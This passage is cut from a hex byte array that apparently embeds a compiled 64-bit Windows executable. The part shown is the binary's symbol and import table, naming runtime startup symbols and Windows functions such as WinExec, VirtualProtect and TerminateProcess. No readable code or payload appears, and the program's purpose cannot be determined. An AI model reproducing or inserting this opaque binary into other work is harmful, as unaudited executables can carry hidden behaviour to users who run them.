,0x2e ,0x5f ,0x5f ,0x43 ,0x54 ,0x4f ,0x52 ,0x5f ,0x4c ,0x49 ,0x53 ,0x54 ,0x5f ,0x5f ,0x00 ,0x56 ,0x69 ,0x72 ,0x74 ,0x75 ,0x61 ,0x6c ,0x51 ,0x75 ,0x65 ,0x72 ,0x79 ,0x00 ,0x5f ,0x5f ,0x5f ,0x63 ,0x72 ,0x74 ,0x5f ,0x78 ,0x69 ,0x5f ,0x73 ,0x74 ,0x61 ,0x72 ,0x74 ,0x5f ,0x5f ,0x00 ,0x5f ,0x5f ,0x69 ,0x6d ,0x70 ,0x5f ,0x5f ,0x61 ,0x6d ,0x73 ,0x67 ,0x5f ,0x65 ,0x78 ,0x69 ,0x74 ,0x00 ,0x5f ,0x5f ,0x5f ,0x63 ,0x72 ,0x74 ,0x5f ,0x78 ,0x69 ,0x5f ,0x65 ,0x6e ,0x64 ,0x5f ,0x5f ,0x00 ,0x5f ,0x74 ,0x6c ,0x73 ,0x5f ,0x73 ,0x74 ,0x61 ,0x72 ,0x74 ,0x00 ,0x2e ,0x72 ,0x65 ,0x66 ,0x70 ,0x74 ,0x72 ,0x2e ,0x5f ,0x5f ,0x52 ,0x55 ,0x4e ,0x54 ,0x49 ,0x4d ,0x45 ,0x5f ,0x50 ,0x53 ,0x45 ,0x55 ,0x44 ,0x4f ,0x5f ,0x52 ,0x45 ,0x4c ,0x4f ,0x43 ,0x5f ,0x4c ,0x49 ,0x53 ,0x54 ,0x5f ,0x5f ,0x00 ,0x5f ,0x5f ,0x6d ,0x69 ,0x6e ,0x67 ,0x77 ,0x5f ,0x6f ,0x6c ,0x64 ,0x65 ,0x78 ,0x63 ,0x70 ,0x74 ,0x5f ,0x68 ,0x61 ,0x6e ,0x64 ,0x6c ,0x65 ,0x72 ,0x00 ,0x5f ,0x5f ,0x69 ,0x6d ,0x70 ,0x5f ,0x47 ,0x65 ,0x74 ,0x43 ,0x75 ,0x72 ,0x72 ,0x65 ,0x6e ,0x74 ,0x54 ,0x68 ,0x72 ,0x65 ,0x61 ,0x64 ,0x49 ,0x64 ,0x00 ,0x47 ,0x65 ,0x74 ,0x43 ,0x75 ,0x72 ,0x72 ,0x65 ,0x6e ,0x74 ,0x50 ,0x72 ,0x6f ,0x63 ,0x65 ,0x73 ,0x73 ,0x49 ,0x64 ,0x00 ,0x54 ,0x6c ,0x73 ,0x47 ,0x65 ,0x74 ,0x56 ,0x61 ,0x6c ,0x75 ,0x65 ,0x00 ,0x54 ,0x65 ,0x72 ,0x6d ,0x69 ,0x6e ,0x61 ,0x74 ,0x65 ,0x50 ,0x72 ,0x6f ,0x63 ,0x65 ,0x73 ,0x73 ,0x00 ,0x5f ,0x5f ,0x62 ,0x73 ,0x73 ,0x5f ,0x73 ,0x74 ,0x61 ,0x72 ,0x74 ,0x5f ,0x5f ,0x00 ,0x5f ,0x5f ,0x5f ,0x52 ,0x55 ,0x4e ,0x54 ,0x49 ,0x4d ,0x45 ,0x5f ,0x50 ,0x53 ,0x45 ,0x55 ,0x44 ,0x4f ,0x5f ,0x52 ,0x45 ,0x4c ,0x4f ,0x43 ,0x5f ,0x4c ,0x49 ,0x53 ,0x54 ,0x5f ,0x45 ,0x4e ,0x44 ,0x5f ,0x5f ,0x00 ,0x52 ,0x74 ,0x6c ,0x4c ,0x6f ,0x6f ,0x6b ,0x75 ,0x70 ,0x46 ,0x75 ,0x6e ,0x63 ,0x74 ,0x69 ,0x6f ,0x6e ,0x45 ,0x6e ,0x74 ,0x72 ,0x79 ,0x00 ,0x5f ,0x5f ,0x73 ,0x69 ,0x7a ,0x65 ,0x5f ,0x6f ,0x66 ,0x5f ,0x68 ,0x65 ,0x61 ,0x70 ,0x5f ,0x63 ,0x6f ,0x6d ,0x6d ,0x69 ,0x74 ,0x5f ,0x5f ,0x00 ,0x5f ,0x5f ,0x69 ,0x6d ,0x70 ,0x5f ,0x47 ,0x65 ,0x74 ,0x4c ,0x61 ,0x73 ,0x74 ,0x45 ,0x72 ,0x72 ,0x6f ,0x72 ,0x00 ,0x5f ,0x5f ,0x69 ,0x6d ,0x70 ,0x5f ,0x66 ,0x72 ,0x65 ,0x65 ,0x00 ,0x5f ,0x5f ,0x69 ,0x6d ,0x70 ,0x5f ,0x52 ,0x74 ,0x6c ,0x4c ,0x6f ,0x6f ,0x6b ,0x75 ,0x70 ,0x46 ,0x75 ,0x6e ,0x63 ,0x74 ,0x69 ,0x6f ,0x6e ,0x45 ,0x6e ,0x74 ,0x72 ,0x79 ,0x00 ,0x56 ,0x69 ,0x72 ,0x74 ,0x75 ,0x61 ,0x6c ,0x50 ,0x72 ,0x6f ,0x74 ,0x65 ,0x63 ,0x74 ,0x00 ,0x6d ,0x69 ,0x6e ,0x67 ,0x77 ,0x5f ,0x61 ,0x70 ,0x70 ,0x5f ,0x74 ,0x79 ,0x70 ,0x65 ,0x00 ,0x5f ,0x5f ,0x5f ,0x63 ,0x72 ,0x74 ,0x5f ,0x78 ,0x70 ,0x5f ,0x73 ,0x74 ,0x61 ,0x72 ,0x74 ,0x5f ,0x5f ,0x00 ,0x5f ,0x5f ,0x69 ,0x6d ,0x70 ,0x5f ,0x4c ,0x65 ,0x61 ,0x76 ,0x65 ,0x43 ,0x72 ,0x69 ,0x74 ,0x69 ,0x63 ,0x61 ,0x6c ,0x53 ,0x65 ,0x63 ,0x74 ,0x69 ,0x6f ,0x6e ,0x00 ,0x5f ,0x5f ,0x69 ,0x6d ,0x70 ,0x5f ,0x47 ,0x65 ,0x74 ,0x54 ,0x69 ,0x63 ,0x6b ,0x43 ,0x6f ,0x75 ,0x6e ,0x74 ,0x00 ,0x2e ,0x72 ,0x65 ,0x66 ,0x70 ,0x74 ,0x72 ,0x2e ,0x5f ,0x5f ,0x52 ,0x55 ,0x4e ,0x54 ,0x49 ,0x4d ,0x45 ,0x5f ,0x50 ,0x53 ,0x45 ,0x55 ,0x44 ,0x4f ,0x5f ,0x52 ,0x45 ,0x4c ,0x4f ,0x43 ,0x5f ,0x4c ,0x49 ,0x53 ,0x54 ,0x5f ,0x45 ,0x4e ,0x44 ,0x5f ,0x5f ,0x00 ,0x5f ,0x5f ,0x5f ,0x63 ,0x72 ,0x74 ,0x5f ,0x78 ,0x70 ,0x5f ,0x65 ,0x6e ,0x64 ,0x5f ,0x5f ,0x00 ,0x5f ,0x5f ,0x6d ,0x69 ,0x6e ,0x6f ,0x72 ,0x5f ,0x6f ,0x73 ,0x5f ,0x76 ,0x65 ,0x72 ,0x73 ,0x69 ,0x6f ,0x6e ,0x5f ,0x5f ,0x00 ,0x5f ,0x5f ,0x69 ,0x6d ,0x70 ,0x5f ,0x47 ,0x65 ,0x74 ,0x53 ,0x79 ,0x73 ,0x74 ,0x65 ,0x6d ,0x54 ,0x69 ,0x6d ,0x65 ,0x41 ,0x73 ,0x46 ,0x69 ,0x6c ,0x65 ,0x54 ,0x69 ,0x6d ,0x65 ,0x00 ,0x45 ,0x6e ,0x74 ,0x65 ,0x72 ,0x43 ,0x72 ,0x69 ,0x74 ,0x69 ,0x63 ,0x61 ,0x6c ,0x53 ,0x65 ,0x63 ,0x74 ,0x69 ,0x6f ,0x6e ,0x00 ,0x2e ,0x72 ,0x65 ,0x66 ,0x70 ,0x74 ,0x72 ,0x2e ,0x5f ,0x5f ,0x78 ,0x69 ,0x5f ,0x61 ,0x00 ,0x5f ,0x5f ,0x69 ,0x6d ,0x61 ,0x67 ,0x65 ,0x5f ,0x62 ,0x61 ,0x73 ,0x65 ,0x5f ,0x5f ,0x00 ,0x2e ,0x72 ,0x65 ,0x66 ,0x70 ,0x74 ,0x72 ,0x2e ,0x5f ,0x43 ,0x52 ,0x54 ,0x5f ,0x4d ,0x54 ,0x00 ,0x52 ,0x74 ,0x6c ,0x43 ,0x61 ,0x70 ,0x74 ,0x75 ,0x72 ,0x65 ,0x43 ,0x6f ,0x6e ,0x74 ,0x65 ,0x78 ,0x74 ,0x00 ,0x5f ,0x5f ,0x73 ,0x65 ,0x63 ,0x74 ,0x69 ,0x6f ,0x6e ,0x5f ,0x61 ,0x6c ,0x69 ,0x67 ,0x6e ,0x6d ,0x65 ,0x6e ,0x74 ,0x5f ,0x5f ,0x00 ,0x5f ,0x5f ,0x6e ,0x61 ,0x74 ,0x69 ,0x76 ,0x65 ,0x5f ,0x64 ,0x6c ,0x6c ,0x6d ,0x61 ,0x69 ,0x6e ,0x5f ,0x72 ,0x65 ,0x61 ,0x73 ,0x6f ,0x6e ,0x00 ,0x5f ,0x5f ,0x6c ,0x69 ,0x62 ,0x36 ,0x34 ,0x5f ,0x6c ,0x69 ,0x62 ,0x75 ,0x73 ,0x65 ,0x72 ,0x33 ,0x32 ,0x5f ,0x61 ,0x5f ,0x69 ,0x6e ,0x61 ,0x6d ,0x65 ,0x00 ,0x5f ,0x74 ,0x6c ,0x73 ,0x5f ,0x75 ,0x73 ,0x65 ,0x64 ,0x00 ,0x55 ,0x6e ,0x68 ,0x61 ,0x6e ,0x64 ,0x6c ,0x65 ,0x64 ,0x45 ,0x78 ,0x63 ,0x65 ,0x70 ,0x74 ,0x69 ,0x6f ,0x6e ,0x46 ,0x69 ,0x6c ,0x74 ,0x65 ,0x72 ,0x00 ,0x5f ,0x5f ,0x49 ,0x41 ,0x54 ,0x5f ,0x65 ,0x6e ,0x64 ,0x5f ,0x5f ,0x00 ,0x5f ,0x5f ,0x52 ,0x55 ,0x4e ,0x54 ,0x49 ,0x4d ,0x45 ,0x5f ,0x50 ,0x53 ,0x45 ,0x55 ,0x44 ,0x4f ,0x5f ,0x52 ,0x45 ,0x4c ,0x4f ,0x43 ,0x5f ,0x4c ,0x49 ,0x53 ,0x54 ,0x5f ,0x5f ,0x00 ,0x5f ,0x5f ,0x69 ,0x6d ,0x70 ,0x5f ,0x52 ,0x74 ,0x6c ,0x41 ,0x64 ,0x64 ,0x46 ,0x75 ,0x6e ,0x63 ,0x74 ,0x69 ,0x6f ,0x6e ,0x54 ,0x61 ,0x62 ,0x6c ,0x65 ,0x00 ,0x5f ,0x5f ,0x64 ,0x61 ,0x74 ,0x61 ,0x5f ,0x65 ,0x6e ,0x64 ,0x5f ,0x5f ,0x00 ,0x5f ,0x5f ,0x69 ,0x6d ,0x70 ,0x5f ,0x66 ,0x77 ,0x72 ,0x69 ,0x74 ,0x65 ,0x00 ,0x5f ,0x5f ,0x43 ,0x54 ,0x4f ,0x52 ,0x5f ,0x4c ,0x49 ,0x53 ,0x54 ,0x5f ,0x5f ,0x00 ,0x5f ,0x68 ,0x65 ,0x61 ,0x64 ,0x5f ,0x6c ,0x69 ,0x62 ,0x36 ,0x34 ,0x5f ,0x6c ,0x69 ,0x62 ,0x6b ,0x65 ,0x72 ,0x6e ,0x65 ,0x6c ,0x33 ,0x32 ,0x5f ,0x61 ,0x00 ,0x5f ,0x5f ,0x62 ,0x73 ,0x73 ,0x5f ,0x65 ,0x6e ,0x64 ,0x5f ,0x5f ,0x00 ,0x47 ,0x65 ,0x74 ,0x54 ,0x69 ,0x63 ,0x6b ,0x43 ,0x6f ,0x75 ,0x6e ,0x74 ,0x00 ,0x5f ,0x5f ,0x6e ,0x61 ,0x74 ,0x69 ,0x76 ,0x65 ,0x5f ,0x76 ,0x63 ,0x63 ,0x6c ,0x72 ,0x69 ,0x74 ,0x5f ,0x72 ,0x65 ,0x61 ,0x73 ,0x6f ,0x6e ,0x00 ,0x5f ,0x5f ,0x5f ,0x63 ,0x72 ,0x74 ,0x5f ,0x78 ,0x63 ,0x5f ,0x65 ,0x6e ,0x64 ,0x5f ,0x5f ,0x00 ,0x52 ,0x74 ,0x6c ,0x41 ,0x64 ,0x64 ,0x46 ,0x75 ,0x6e ,0x63 ,0x74 ,0x69 ,0x6f ,0x6e ,0x54 ,0x61 ,0x62 ,0x6c ,0x65 ,0x00 ,0x2e ,0x72 ,0x65 ,0x66 ,0x70 ,0x74 ,0x72 ,0x2e ,0x5f ,0x5f ,0x6e ,0x61 ,0x74 ,0x69 ,0x76 ,0x65 ,0x5f ,0x73 ,0x74 ,0x61 ,0x72 ,0x74 ,0x75 ,0x70 ,0x5f ,0x6c ,0x6f ,0x63 ,0x6b ,0x00 ,0x5f ,0x5f ,0x69 ,0x6d ,0x70 ,0x5f ,0x45 ,0x6e ,0x74 ,0x65 ,0x72 ,0x43 ,0x72 ,0x69 ,0x74 ,0x69 ,0x63 ,0x61 ,0x6c ,0x53 ,0x65 ,0x63 ,0x74 ,0x69 ,0x6f ,0x6e ,0x00 ,0x5f ,0x74 ,0x6c ,0x73 ,0x5f ,0x69 ,0x6e ,0x64 ,0x65 ,0x78 ,0x00 ,0x5f ,0x5f ,0x6e ,0x61 ,0x74 ,0x69 ,0x76 ,0x65 ,0x5f ,0x73 ,0x74 ,0x61 ,0x72 ,0x74 ,0x75 ,0x70 ,0x5f ,0x73 ,0x74 ,0x61 ,0x74 ,0x65 ,0x00 ,0x5f ,0x5f ,0x5f ,0x63 ,0x72 ,0x74 ,0x5f ,0x78 ,0x63 ,0x5f ,0x73 ,0x74 ,0x61 ,0x72 ,0x74 ,0x5f ,0x5f ,0x00 ,0x5f ,0x5f ,0x69 ,0x6d ,0x70 ,0x5f ,0x47 ,0x65 ,0x74 ,0x43 ,0x75 ,0x72 ,0x72 ,0x65 ,0x6e ,0x74 ,0x50 ,0x72 ,0x6f ,0x63 ,0x65 ,0x73 ,0x73 ,0x49 ,0x64 ,0x00 ,0x5f ,0x5f ,0x69 ,0x6d ,0x70 ,0x5f ,0x54 ,0x65 ,0x72 ,0x6d ,0x69 ,0x6e ,0x61 ,0x74 ,0x65 ,0x50 ,0x72 ,0x6f ,0x63 ,0x65 ,0x73 ,0x73 ,0x00 ,0x5f ,0x5f ,0x6c ,0x69 ,0x62 ,0x36 ,0x34 ,0x5f ,0x6c ,0x69 ,0x62 ,0x6d ,0x73 ,0x76 ,0x63 ,0x72 ,0x74 ,0x5f ,0x6f ,0x73 ,0x5f ,0x61 ,0x5f ,0x69 ,0x6e ,0x61 ,0x6d ,0x65 ,0x00 ,0x5f ,0x5f ,0x5f ,0x43 ,0x54 ,0x4f ,0x52 ,0x5f ,0x4c ,0x49 ,0x53 ,0x54 ,0x5f ,0x5f ,0x00 ,0x2e ,0x72 ,0x65 ,0x66 ,0x70 ,0x74 ,0x72 ,0x2e ,0x5f ,0x5f ,0x64 ,0x79 ,0x6e ,0x5f ,0x74 ,0x6c ,0x73 ,0x5f ,0x69 ,0x6e ,0x69 ,0x74 ,0x5f ,0x63 ,0x61 ,0x6c ,0x6c ,0x62 ,0x61 ,0x63 ,0x6b ,0x00 ,0x5f ,0x5f ,0x69 ,0x6d ,0x70 ,0x5f ,0x73 ,0x69 ,0x67 ,0x6e ,0x61 ,0x6c ,0x00 ,0x5f ,0x5f ,0x69 ,0x6d ,0x70 ,0x5f ,0x5f ,0x72 ,0x65 ,0x67 ,0x69 ,0x73 ,0x74 ,0x65 ,0x72 ,0x5f ,0x6f ,0x6e ,0x65 ,0x78 ,0x69 ,0x74 ,0x5f ,0x66 ,0x75 ,0x6e ,0x63 ,0x74 ,0x69 ,0x6f ,0x6e ,0x00 ,0x5f ,0x5f ,0x72 ,0x74 ,0x5f ,0x70 ,0x73 ,0x72 ,0x65 ,0x6c ,0x6f ,0x63 ,0x73 ,0x5f ,0x73 ,0x69 ,0x7a ,0x65 ,0x00 ,0x5f ,0x5f ,0x69 ,0x6d ,0x70 ,0x5f ,0x51 ,0x75 ,0x65 ,0x72 ,0x79 ,0x50 ,0x65 ,0x72 ,0x66 ,0x6f ,0x72 ,0x6d ,0x61 ,0x6e ,0x63 ,0x65 ,0x43 ,0x6f ,0x75 ,0x6e ,0x74 ,0x65 ,0x72 ,0x00 ,0x5f ,0x5f ,0x69 ,0x6d ,0x70 ,0x5f ,0x73 ,0x74 ,0x72 ,0x6c ,0x65 ,0x6e ,0x00 ,0x5f ,0x5f ,0x66 ,0x69 ,0x6c ,0x65 ,0x5f ,0x61 ,0x6c ,0x69 ,0x67 ,0x6e ,0x6d ,0x65 ,0x6e ,0x74 ,0x5f ,0x5f ,0x00 ,0x5f ,0x5f ,0x69 ,0x6d ,0x70 ,0x5f ,0x49 ,0x6e ,0x69 ,0x74 ,0x69 ,0x61 ,0x6c ,0x69 ,0x7a ,0x65 ,0x43 ,0x72 ,0x69 ,0x74 ,0x69 ,0x63 ,0x61 ,0x6c ,0x53 ,0x65 ,0x63 ,0x74 ,0x69 ,0x6f ,0x6e ,0x00 ,0x5f ,0x5f ,0x69 ,0x6d ,0x70 ,0x5f ,0x72 ,0x65 ,0x61 ,0x6c ,0x6c ,0x6f ,0x63 ,0x00 ,0x49 ,0x6e ,0x69 ,0x74 ,0x69 ,0x61 ,0x6c ,0x69 ,0x7a ,0x65 ,0x43 ,0x72 ,0x69 ,0x74 ,0x69 ,0x63 ,0x61 ,0x6c ,0x53 ,0x65 ,0x63 ,0x74 ,0x69 ,0x6f ,0x6e ,0x00 ,0x5f ,0x5f ,0x69 ,0x6d ,0x70 ,0x5f ,0x76 ,0x66 ,0x70 ,0x72 ,0x69 ,0x6e ,0x74 ,0x66 ,0x00 ,0x5f ,0x5f ,0x6d ,0x61 ,0x6a ,0x6f ,0x72 ,0x5f ,0x6f ,0x73 ,0x5f ,0x76 ,0x65 ,0x72 ,0x73 ,0x69 ,0x6f ,0x6e ,0x5f ,0x5f ,0x00 ,0x5f ,0x5f ,0x49 ,0x41 ,0x54 ,0x5f ,0x73 ,0x74 ,0x61 ,0x72 ,0x74 ,0x5f ,0x5f ,0x00 ,0x5f ,0x5f ,0x69 ,0x6d ,0x70 ,0x5f ,0x55 ,0x6e ,0x68 ,0x61 ,0x6e ,0x64 ,0x6c ,0x65 ,0x64 ,0x45 ,0x78 ,0x63 ,0x65 ,0x70 ,0x74 ,0x69 ,0x6f ,0x6e ,0x46 ,0x69 ,0x6c ,0x74 ,0x65 ,0x72 ,0x00 ,0x5f ,0x5f ,0x69 ,0x6d ,0x70 ,0x5f ,0x53 ,0x65 ,0x74 ,0x55 ,0x6e ,0x68 ,0x61 ,0x6e ,0x64 ,0x6c ,0x65 ,0x64 ,0x45 ,0x78 ,0x63 ,0x65 ,0x70 ,0x74 ,0x69 ,0x6f ,0x6e ,0x46 ,0x69 ,0x6c ,0x74 ,0x65 ,0x72 ,0x00 ,0x2e ,0x72 ,0x65 ,0x66 ,0x70 ,0x74 ,0x72 ,0x2e ,0x6d ,0x69 ,0x6e ,0x67 ,0x77 ,0x5f ,0x61 ,0x70 ,0x70 ,0x5f ,0x74 ,0x79 ,0x70 ,0x65 ,0x00 ,0x5f ,0x5f ,0x44 ,0x54 ,0x4f ,0x52 ,0x5f ,0x4c ,0x49 ,0x53 ,0x54 ,0x5f ,0x5f ,0x00 ,0x52 ,0x74 ,0x6c ,0x56 ,0x69 ,0x72 ,0x74 ,0x75 ,0x61 ,0x6c ,0x55 ,0x6e ,0x77 ,0x69 ,0x6e ,0x64 ,0x00 ,0x5f ,0x5f ,0x69 ,0x6d ,0x70 ,0x5f ,0x5f ,0x69 ,0x6e ,0x69 ,0x74 ,0x69 ,0x61 ,0x6c ,0x69 ,0x7a ,0x65 ,0x5f ,0x6f ,0x6e ,0x65 ,0x78 ,0x69 ,0x74 ,0x5f ,0x74 ,0x61 ,0x62 ,0x6c ,0x65 ,0x00 ,0x5f ,0x5f ,0x69 ,0x6d ,0x70 ,0x5f ,0x53 ,0x6c ,0x65 ,0x65 ,0x70 ,0x00 ,0x4c ,0x65 ,0x61 ,0x76 ,0x65 ,0x43 ,0x72 ,0x69 ,0x74 ,0x69 ,0x63 ,0x61 ,0x6c ,0x53 ,0x65 ,0x63 ,0x74 ,0x69 ,0x6f ,0x6e ,0x00 ,0x5f ,0x5f ,0x73 ,0x69 ,0x7a ,0x65 ,0x5f ,0x6f ,0x66 ,0x5f ,0x68 ,0x65 ,0x61 ,0x70 ,0x5f ,0x72 ,0x65 ,0x73 ,0x65 ,0x72 ,0x76 ,0x65 ,0x5f ,0x5f ,0x00 ,0x5f ,0x5f ,0x5f ,0x63 ,0x72 ,0x74 ,0x5f ,0x78 ,0x74 ,0x5f ,0x73 ,0x74 ,0x61 ,0x72 ,0x74 ,0x5f ,0x5f ,0x00 ,0x5f ,0x5f ,0x73 ,0x75 ,0x62 ,0x73 ,0x79 ,0x73 ,0x74 ,0x65 ,0x6d ,0x5f ,0x5f ,0x00 ,0x5f ,0x61 ,0x6d ,0x73 ,0x67 ,0x5f ,0x65 ,0x78 ,0x69 ,0x74 ,0x00 ,0x5f ,0x5f ,0x73 ,0x65 ,0x63 ,0x75 ,0x72 ,0x69 ,0x74 ,0x79 ,0x5f ,0x63 ,0x6f ,0x6f ,0x6b ,0x69 ,0x65 ,0x5f ,0x63 ,0x6f ,0x6d ,0x70 ,0x6c ,0x65 ,0x6d ,0x65 ,0x6e ,0x74 ,0x00 ,0x5f ,0x5f ,0x69 ,0x6d ,0x70 ,0x5f ,0x54 ,0x6c ,0x73 ,0x47 ,0x65 ,0x74 ,0x56 ,0x61 ,0x6c ,0x75 ,0x65 ,0x00 ,0x47 ,0x65 ,0x74 ,0x43 ,0x75 ,0x72 ,0x72 ,0x65 ,0x6e ,0x74 ,0x50 ,0x72 ,0x6f ,0x63 ,0x65 ,0x73 ,0x73 ,0x00 ,0x5f ,0x5f ,0x69 ,0x6d ,0x70 ,0x5f ,0x5f ,0x65 ,0x78 ,0x65 ,0x63 ,0x75 ,0x74 ,0x65 ,0x5f ,0x6f ,0x6e ,0x65 ,0x78 ,0x69 ,0x74 ,0x5f ,0x74 ,0x61 ,0x62 ,0x6c ,0x65 ,0x00 ,0x5f ,0x5f ,0x69 ,0x6d ,0x70 ,0x5f ,0x56 ,0x69 ,0x72 ,0x74 ,0x75 ,0x61 ,0x6c ,0x50 ,0x72 ,0x6f ,0x74 ,0x65 ,0x63 ,0x74 ,0x00 ,0x5f ,0x5f ,0x5f ,0x74 ,0x6c ,0x73 ,0x5f ,0x65 ,0x6e ,0x64 ,0x5f ,0x5f ,0x00 ,0x51 ,0x75 ,0x65 ,0x72 ,0x79 ,0x50 ,0x65 ,0x72 ,0x66 ,0x6f ,0x72 ,0x6d ,0x61 ,0x6e ,0x63 ,0x65 ,0x43 ,0x6f ,0x75 ,0x6e ,0x74 ,0x65 ,0x72 ,0x00 ,0x5f ,0x5f ,0x69 ,0x6d ,0x70 ,0x5f ,0x56 ,0x69 ,0x72 ,0x74 ,0x75 ,0x61 ,0x6c ,0x51 ,0x75 ,0x65 ,0x72 ,0x79 ,0x00 ,0x5f ,0x5f ,0x69 ,0x6d ,0x70 ,0x5f ,0x5f ,0x69 ,0x6e ,0x69 ,0x74 ,0x74 ,0x65 ,0x72 ,0x6d ,0x00 ,0x6d ,0x69 ,0x6e ,0x67 ,0x77 ,0x5f ,0x69 ,0x6e ,0x69 ,0x74 ,0x6c ,0x74 ,0x73 ,0x64 ,0x79 ,0x6e ,0x5f ,0x66 ,0x6f ,0x72 ,0x63 ,0x65 ,0x00 ,0x5f ,0x5f ,0x69 ,0x6d ,0x70 ,0x5f ,0x5f ,0x5f ,0x69 ,0x6f ,0x62 ,0x5f ,0x66 ,0x75 ,0x6e ,0x63 ,0x00 ,0x5f ,0x5f ,0x64 ,0x79 ,0x6e ,0x5f ,0x74 ,0x6c ,0x73 ,0x5f ,0x69 ,0x6e ,0x69 ,0x74 ,0x5f ,0x63 ,0x61 ,0x6c ,0x6c ,0x62 ,0x61 ,0x63 ,0x6b ,0x00 ,0x5f ,0x68 ,0x65 ,0x61 ,0x64 ,0x5f ,0x6c ,0x69 ,0x62 ,0x36 ,0x34 ,0x5f ,0x6c ,0x69 ,0x62 ,0x75 ,0x73 ,0x65 ,0x72 ,0x33 ,0x32 ,0x5f ,0x61 ,0x00 ,0x2e ,0x72 ,0x65 ,0x66 ,0x70 ,0x74 ,0x72 ,0x2e ,0x5f ,0x5f ,0x69 ,0x6d ,0x61 ,0x67 ,0x65 ,0x5f ,0x62 ,0x61 ,0x73 ,0x65 ,0x5f ,0x5f ,0x00 ,0x5f ,0x69 ,0x6e ,0x69 ,0x74 ,0x74 ,0x65 ,0x72 ,0x6d ,0x00 ,0x5f ,0x5f ,0x69 ,0x6d ,0x70 ,0x5f ,0x73 ,0x74 ,0x72 ,0x6e ,0x63 ,0x6d ,0x70 ,0x00 ,0x5f ,0x68 ,0x65 ,0x61 ,0x64 ,0x5f ,0x6c ,0x69 ,0x62 ,0x36 ,0x34 ,0x5f ,0x6c ,0x69 ,0x62 ,0x6d ,0x73 ,0x76 ,0x63 ,0x72 ,0x74 ,0x5f ,0x6f ,0x73 ,0x5f ,0x61 ,0x00 ,0x5f ,0x5f ,0x69 ,0x6d ,0x70 ,0x5f ,0x5f ,0x5f ,0x61 ,0x63 ,0x72 ,0x74 ,0x5f ,0x69 ,0x6f ,0x62 ,0x5f ,0x66 ,0x75 ,0x6e ,0x63 ,0x00 ,0x5f ,0x5f ,0x6d ,0x61 ,0x6a ,0x6f ,0x72 ,0x5f ,0x69 ,0x6d ,0x61 ,0x67 ,0x65 ,0x5f ,0x76 ,0x65 ,0x72 ,0x73 ,0x69 ,0x6f ,0x6e ,0x5f ,0x5f ,0x00 ,0x5f ,0x5f ,0x6c ,0x6f ,0x61 ,0x64 ,0x65 ,0x72 ,0x5f ,0x66 ,0x6c ,0x61 ,0x67 ,0x73 ,0x5f ,0x5f ,0x00 ,0x5f ,0x5f ,0x5f ,0x63 ,0x68 ,0x6b ,0x73 ,0x74 ,0x6b ,0x5f ,0x6d ,0x73 ,0x00 ,0x5f ,0x5f ,0x6e ,0x61 ,0x74 ,0x69 ,0x76 ,0x65 ,0x5f ,0x73 ,0x74 ,0x61 ,0x72 ,0x74 ,0x75 ,0x70 ,0x5f ,0x6c ,0x6f ,0x63 ,0x6b ,0x00 ,0x2e ,0x72 ,0x65 ,0x66 ,0x70 ,0x74 ,0x72 ,0x2e ,0x5f ,0x5f ,0x6e ,0x61 ,0x74 ,0x69 ,0x76 ,0x65 ,0x5f ,0x64 ,0x6c ,0x6c ,0x6d ,0x61 ,0x69 ,0x6e ,0x5f ,0x72 ,0x65 ,0x61 ,0x73 ,0x6f ,0x6e ,0x00 ,0x47 ,0x65 ,0x74 ,0x43 ,0x75 ,0x72 ,0x72 ,0x65 ,0x6e ,0x74 ,0x54 ,0x68 ,0x72 ,0x65 ,0x61 ,0x64 ,0x49 ,0x64 ,0x00 ,0x5f ,0x5f ,0x72 ,0x74 ,0x5f ,0x70 ,0x73 ,0x72 ,0x65 ,0x6c ,0x6f ,0x63 ,0x73 ,0x5f ,0x65 ,0x6e ,0x64 ,0x00 ,0x5f ,0x5f ,0x6d ,0x69 ,0x6e ,0x6f ,0x72 ,0x5f ,0x73 ,0x75 ,0x62 ,0x73 ,0x79 ,0x73 ,0x74 ,0x65 ,0x6d ,0x5f ,0x76 ,0x65 ,0x72 ,0x73 ,0x69 ,0x6f ,0x6e ,0x5f ,0x5f ,0x00 ,0x5f ,0x5f ,0x6d ,0x69 ,0x6e ,0x6f ,0x72 ,0x5f ,0x69 ,0x6d ,0x61 ,0x67 ,0x65 ,0x5f ,0x76 ,0x65 ,0x72 ,0x73 ,0x69 ,0x6f ,0x6e ,0x5f ,0x5f ,0x00 ,0x5f ,0x5f ,0x69 ,0x6d ,0x70 ,0x5f ,0x5f ,0x75 ,0x6e ,0x6c ,0x6f ,0x63 ,0x6b ,0x00 ,0x5f ,0x5f ,0x69 ,0x6d ,0x70 ,0x5f ,0x57 ,0x69 ,0x6e ,0x45 ,0x78 ,0x65 ,0x63 ,0x00 ,0x6d ,0x69 ,0x6e ,0x67 ,0x77 ,0x5f ,0x69 ,0x6e ,0x69 ,0x74 ,0x6c ,0x74 ,0x73 ,0x64 ,0x72 ,0x6f ,0x74 ,0x5f ,0x66 ,0x6f ,0x72 ,0x63 ,0x65 ,0x00 ,0x2e ,0x72 ,0x65 ,0x66 ,0x70 ,0x74 ,0x72 ,0x2e ,0x5f ,0x5f ,0x78 ,0x63 ,0x5f ,0x61 ,0x00 ,0x2e ,0x72 ,0x65 ,0x66 ,0x70 ,0x74 ,0x72 ,0x2e ,0x5f ,0x5f ,0x78 ,0x69 ,0x5f ,0x7a ,0x00 ,0x44 ,0x65 ,0x6c ,0x65 ,0x74 ,0x65 ,0x43 ,0x72 ,0x69 ,0x74 ,0x69 ,0x63 ,0x61 ,0x6c ,0x53 ,0x65 ,0x63 ,0x74 ,0x69 ,0x6f ,0x6e ,0x00 ,0x5f ,0x5f ,0x69 ,0x6d ,0x70 ,0x5f ,0x52 ,0x74 ,0x6c ,0x43 ,0x61 ,0x70 ,0x74 ,0x75 ,0x72 ,0x65 ,0x43 ,0x6f ,0x6e ,0x74 ,0x65 ,0x78 ,0x74 ,0x00 ,0x5f ,0x5f ,0x52 ,0x55 ,0x4e ,0x54 ,0x49 ,0x4d ,0x45 ,0x5f ,0x50 ,0x53 ,0x45 ,0x55 ,0x44 ,0x4f ,0x5f ,0x52 ,0x45 ,0x4c ,0x4f ,0x43 ,0x5f ,0x4c ,0x49 ,0x53 ,0x54 ,0x5f ,0x45 ,0x4e ,0x44 ,0x5f ,0x5f ,0x00 ,0x5f ,0x5f ,0x69 ,0x6d ,0x70 ,0x5f ,0x47 ,0x65 ,0x74 ,0x43 ,0x75 ,0x72 ,0x72 ,0x65 ,0x6e ,0x74 ,0x50 ,0x72 ,0x6f ,0x63 ,0x65 ,0x73 ,0x73 ,0x00 ,0x2e ,0x72 ,0x65 ,0x66 ,0x70 ,0x74 ,0x72 ,0x2e ,0x5f ,0x5f ,0x78 ,0x63 ,0x5f ,0x7a ,0x00 ,0x5f ,0x5f ,0x5f 